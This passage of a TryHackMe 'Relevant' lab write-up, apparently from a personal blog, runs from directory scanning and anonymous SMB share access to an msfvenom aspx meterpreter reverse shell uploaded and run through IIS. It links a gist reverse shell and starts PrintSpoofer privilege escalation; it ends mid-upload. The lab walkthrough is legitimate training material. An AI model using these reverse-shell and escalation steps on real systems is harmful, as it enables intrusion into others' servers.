&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">💥&lt;/span> &lt;span class="n">Timeout&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="n">secs&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="mi">7&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🦡&lt;/span> &lt;span class="n">User&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">Agent&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="n">feroxbuster&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="mf">2.10.3&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🔎&lt;/span> &lt;span class="n">Extract&lt;/span> &lt;span class="n">Links&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="kc">true&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🏁&lt;/span> &lt;span class="n">HTTP&lt;/span> &lt;span class="n">methods&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">GET&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🚫&lt;/span> &lt;span class="n">Do&lt;/span> &lt;span class="n">Not&lt;/span> &lt;span class="n">Recurse&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="kc">true&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🎉&lt;/span> &lt;span class="n">New&lt;/span> &lt;span class="n">Version&lt;/span> &lt;span class="n">Available&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="n">https&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="n">github.com&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">epi052&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">feroxbuster&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">releases&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">latest&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="err">───────────────────────────┴──────────────────────&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🏁&lt;/span> &lt;span class="n">Press&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">ENTER&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">to&lt;/span> &lt;span class="n">use&lt;/span> &lt;span class="n">the&lt;/span> &lt;span class="n">Scan&lt;/span> &lt;span class="n">Management&lt;/span> &lt;span class="n">Menu&lt;/span>&lt;span class="err">™&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="err">──────────────────────────────────────────────────&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">404&lt;/span> &lt;span class="n">GET&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="n">l&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="n">w&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="n">c&lt;/span> &lt;span class="n">Auto&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">filtering&lt;/span> &lt;span class="n">found&lt;/span> &lt;span class="mi">404&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">like&lt;/span> &lt;span class="n">response&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">created&lt;/span> &lt;span class="n">new&lt;/span> &lt;span class="n">filter&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="n">toggle&lt;/span> &lt;span class="n">off&lt;/span> &lt;span class="n">with&lt;/span> &lt;span class="c1">--dont-filter&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">200&lt;/span> &lt;span class="n">GET&lt;/span> &lt;span class="mi">334&lt;/span>&lt;span class="n">l&lt;/span> &lt;span class="mi">2089&lt;/span>&lt;span class="n">w&lt;/span> &lt;span class="mi">180418&lt;/span>&lt;span class="n">c&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="mf">10.10.178.5&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">49663&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">iisstart.png&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">200&lt;/span> &lt;span class="n">GET&lt;/span> &lt;span class="mi">32&lt;/span>&lt;span class="n">l&lt;/span> &lt;span class="mi">55&lt;/span>&lt;span class="n">w&lt;/span> &lt;span class="mi">703&lt;/span>&lt;span class="n">c&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="mf">10.10.178.5&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">49663&lt;/span>&lt;span class="o">/&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">301&lt;/span> &lt;span class="n">GET&lt;/span> &lt;span class="mi">2&lt;/span>&lt;span class="n">l&lt;/span> &lt;span class="mi">10&lt;/span>&lt;span class="n">w&lt;/span> &lt;span class="mi">157&lt;/span>&lt;span class="n">c&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="mf">10.10.178.5&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">49663&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">nt4wrksv&lt;/span> &lt;span class="o">=&amp;gt;&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="mf">10.10.178.5&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">49663&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">nt4wrksv&lt;/span>&lt;span class="o">/&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">~/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">cat&lt;/span> &lt;span class="err">$&lt;/span>&lt;span class="n">SECLISTS&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Discovery&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Web&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">Content&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">directory&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">list&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mf">2.3&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">medium.txt&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="n">grep&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="kr">in&lt;/span> &lt;span class="s2">&amp;#34;nt4wrksv&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">220538&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="n">nt4wrksv&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="port-445">Port 445
&lt;/h3>&lt;p>It has a share &lt;code>nt4wrksv&lt;/code> available with anonymous access(Note: the same folder is available from port 49663)
It has a passwords.txt file. This passwords.txt file is also accessible from port 49663. This is a serious vulnerability. I can now upload an aspx reverse shell(since windows) in smb share, then access it from port 49663 to execute it.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="o">~/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">smbclient&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">L&lt;/span> &lt;span class="err">\\\\&lt;/span>&lt;span class="mf">10.10.171.47&lt;/span>&lt;span class="err">\\&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">U&lt;/span> &lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Password&lt;/span> &lt;span class="kr">for&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">WORKGROUP&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="p">]:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">Sharename&lt;/span> &lt;span class="n">Type&lt;/span> &lt;span class="n">Comment&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="c1">--------- ---- -------&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">ADMIN&lt;/span>&lt;span class="err">$&lt;/span> &lt;span class="n">Disk&lt;/span> &lt;span class="n">Remote&lt;/span> &lt;span class="n">Admin&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">C&lt;/span>&lt;span class="err">$&lt;/span> &lt;span class="n">Disk&lt;/span> &lt;span class="n">Default&lt;/span> &lt;span class="n">share&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">IPC&lt;/span>&lt;span class="err">$&lt;/span> &lt;span class="n">IPC&lt;/span> &lt;span class="n">Remote&lt;/span> &lt;span class="n">IPC&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">nt4wrksv&lt;/span> &lt;span class="n">Disk&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SMB1&lt;/span> &lt;span class="n">disabled&lt;/span> &lt;span class="c1">-- no workgroup available&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>I used msfvenom to generate an aspx shell so as to recieve a meterpreter shell. This is the alternate reverse shell to use if you want a nc session: &lt;a class="link" href="https://gist.githubusercontent.com/qtc-de/19dfc9018685fce1ba2092c8e2382a79/raw/6d4df39b991b6fe54c606eee45483b17cdd09c4c/aspx-reverse-shell.aspx" target="_blank" rel="noopener"
>&lt;code>qtc-de&lt;/code>&lt;/a>.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="o">~/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">msfvenom&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">p&lt;/span> &lt;span class="n">windows&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">x64&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">meterpreter_reverse_tcp&lt;/span> &lt;span class="n">lhost&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">IP&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">lport&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">PORT&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">f&lt;/span> &lt;span class="n">aspx&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">o&lt;/span> &lt;span class="n">shell.aspx&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Then started a handler in msfconsole,&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="o">~/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">msf6&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">use&lt;/span> &lt;span class="n">exploit&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">multi&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">handler&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">msf6&lt;/span> &lt;span class="n">exploit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">multi&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">handler&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">set&lt;/span> &lt;span class="n">payload&lt;/span> &lt;span class="n">windows&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">x64&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">meterpreter_reverse_tcp&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">msf6&lt;/span> &lt;span class="n">exploit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">multi&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">handler&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">set&lt;/span> &lt;span class="n">lhost&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">IP&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">msf6&lt;/span> &lt;span class="n">exploit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">multi&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">handler&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">set&lt;/span> &lt;span class="n">lport&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">PORT&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">msf6&lt;/span> &lt;span class="n">exploit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">multi&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">handler&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">run&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Started&lt;/span> &lt;span class="n">reverse&lt;/span> &lt;span class="n">TCP&lt;/span> &lt;span class="n">handler&lt;/span> &lt;span class="n">on&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">IP&lt;/span>&lt;span class="p">]:&lt;/span>&lt;span class="mi">4444&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Uploading the shell file in the &lt;code>nt4wrksv&lt;/code> smb share.(Do change your attack ip and port in the shell.aspx file.)
I uploaded shell.aspx file with put command and queried the shell file from browser, got shell and also &lt;code>user.txt&lt;/code>.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="o">~/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">msf6&lt;/span> &lt;span class="n">exploit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">multi&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">handler&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">run&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Started&lt;/span> &lt;span class="n">reverse&lt;/span> &lt;span class="n">TCP&lt;/span> &lt;span class="n">handler&lt;/span> &lt;span class="n">on&lt;/span> &lt;span class="mf">10.14.82.36&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">4444&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Meterpreter&lt;/span> &lt;span class="n">session&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="n">opened&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="mf">10.14.82.36&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">4444&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="mf">10.10.178.5&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">49732&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="n">at&lt;/span> &lt;span class="mi">2024&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">06&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">17&lt;/span> &lt;span class="mi">02&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">36&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">23&lt;/span> &lt;span class="o">+&lt;/span>&lt;span class="mi">0530&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">meterpreter&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">getuid&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Server&lt;/span> &lt;span class="n">username&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">IIS&lt;/span> &lt;span class="n">APPPOOL&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">DefaultAppPool&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">meterpreter&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">shell&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">c&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">windows&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">system32&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">inetsrv&lt;/span>&lt;span class="o">&amp;gt;&lt;/span>&lt;span class="n">cd&lt;/span> &lt;span class="n">c&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">users&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">bob&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">desktop&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">c&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">Users&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">Bob&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">Desktop&lt;/span>&lt;span class="o">&amp;gt;&lt;/span>&lt;span class="n">type&lt;/span> &lt;span class="n">user.txt&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">type&lt;/span> &lt;span class="n">user.txt&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">THM&lt;/span>&lt;span class="p">{&lt;/span>&lt;span class="n">fdk4ka34vk346ksxfr21tg789ktf45&lt;/span>&lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="privilege-escalation">Privilege Escalation
&lt;/h2>&lt;p>First of all, always check for privileges the current user has.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="n">c&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">Users&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">Bob&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="n">Desktop&lt;/span>&lt;span class="o">&amp;gt;&lt;/span>&lt;span class="n">whoami&lt;/span> &lt;span class="o">/&lt;/span>&lt;span class="n">priv&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">whoami&lt;/span> &lt;span class="o">/&lt;/span>&lt;span class="n">priv&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">PRIVILEGES&lt;/span> &lt;span class="n">INFORMATION&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">----------------------&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Privilege&lt;/span> &lt;span class="n">Name&lt;/span> &lt;span class="n">Description&lt;/span> &lt;span class="n">State&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">=============================&lt;/span> &lt;span class="o">=========================================&lt;/span> &lt;span class="o">========&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SeAssignPrimaryTokenPrivilege&lt;/span> &lt;span class="n">Replace&lt;/span> &lt;span class="n">a&lt;/span> &lt;span class="n">process&lt;/span> &lt;span class="n">level&lt;/span> &lt;span class="n">token&lt;/span> &lt;span class="n">Disabled&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SeIncreaseQuotaPrivilege&lt;/span> &lt;span class="n">Adjust&lt;/span> &lt;span class="n">memory&lt;/span> &lt;span class="n">quotas&lt;/span> &lt;span class="kr">for&lt;/span> &lt;span class="n">a&lt;/span> &lt;span class="n">process&lt;/span> &lt;span class="n">Disabled&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SeAuditPrivilege&lt;/span> &lt;span class="n">Generate&lt;/span> &lt;span class="n">security&lt;/span> &lt;span class="n">audits&lt;/span> &lt;span class="n">Disabled&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SeChangeNotifyPrivilege&lt;/span> &lt;span class="n">Bypass&lt;/span> &lt;span class="n">traverse&lt;/span> &lt;span class="n">checking&lt;/span> &lt;span class="n">Enabled&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SeImpersonatePrivilege&lt;/span> &lt;span class="n">Impersonate&lt;/span> &lt;span class="n">a&lt;/span> &lt;span class="n">client&lt;/span> &lt;span class="n">after&lt;/span> &lt;span class="n">authentication&lt;/span> &lt;span class="n">Enabled&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SeCreateGlobalPrivilege&lt;/span> &lt;span class="n">Create&lt;/span> &lt;span class="n">global&lt;/span> &lt;span class="n">objects&lt;/span> &lt;span class="n">Enabled&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">SeIncreaseWorkingSetPrivilege&lt;/span> &lt;span class="n">Increase&lt;/span> &lt;span class="n">a&lt;/span> &lt;span class="n">process&lt;/span> &lt;span class="n">working&lt;/span> &lt;span class="n">set&lt;/span> &lt;span class="n">Disabled&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We see that the user has &lt;code>SeImpersonatePrivilege&lt;/code>. This means, a specific privilege in Windows OS that allows a process to impersonate a user or another process. So I can abuse this by a custom process to impersonate as the &lt;code>NT\Authority&lt;/code> user.
So to exploit this, quick google search gives us this &lt;a class="link" href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" target="_blank" rel="noopener"
>link&lt;/a> from Hacktricks(A great resource).&lt;/p>
&lt;p>A/c to usage, the command given to the PrintSpoofer.exe in &lt;code>-c&lt;/code> flag will be executed as &lt;code>NT\Authority&lt;/code> user.&lt;/p>
&lt;p>Here is the file &lt;a class="link" href="https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" target="_blank" rel="noopener"
>&lt;code>PrintSpooferx64.exe&lt;/code>&lt;/a>.
I will upload it using the upload command in meterpreter session, then execute it with &lt;code>-c&lt;/code> flag to give a powershell session of privileged user.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="n">meterpreter&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">cd&lt;/span> &lt;span class="s1">&amp;#39;c:&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="s1">inetpub&lt;/span>&lt;span class="err">\&lt;/span>&lt;span class="s1">wwwroot&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s1">t4wrksv&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">meterpreter&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">upload&lt;/span> &lt;span class="n">PrintSpoofer64.exe&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Uploading&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="o">/&lt;/span>&lt;span class="n">Users&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">vikas&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">PrintSpoofer64.exe&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="n">PrintSpoofer64.exe&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Uploaded&lt;/span> &lt;span class="mf">26.50&lt;/span> &lt;span class="n">KiB&lt;/span> &lt;span class="n">of&lt;/span> &lt;span class="mf">26.50&lt;/span> &lt;span class="n">KiB&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="mf">100.0&lt;/span>&lt;span class="o">%&lt;/span>&lt;span class="p">):&lt;/span> &lt;span class="o">/&lt;/span>&lt;span class="n">Users&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">vikas&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">PrintSpoofer64.exe&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="n">PrintSpoofer64.exe&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">[&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="n">Completed&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="o">/&lt;/span>&lt;span class="n">Users&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">vikas&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">PrintSpoofer64.exe&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="n">PrintSpoofer64.exe&lt;/span>
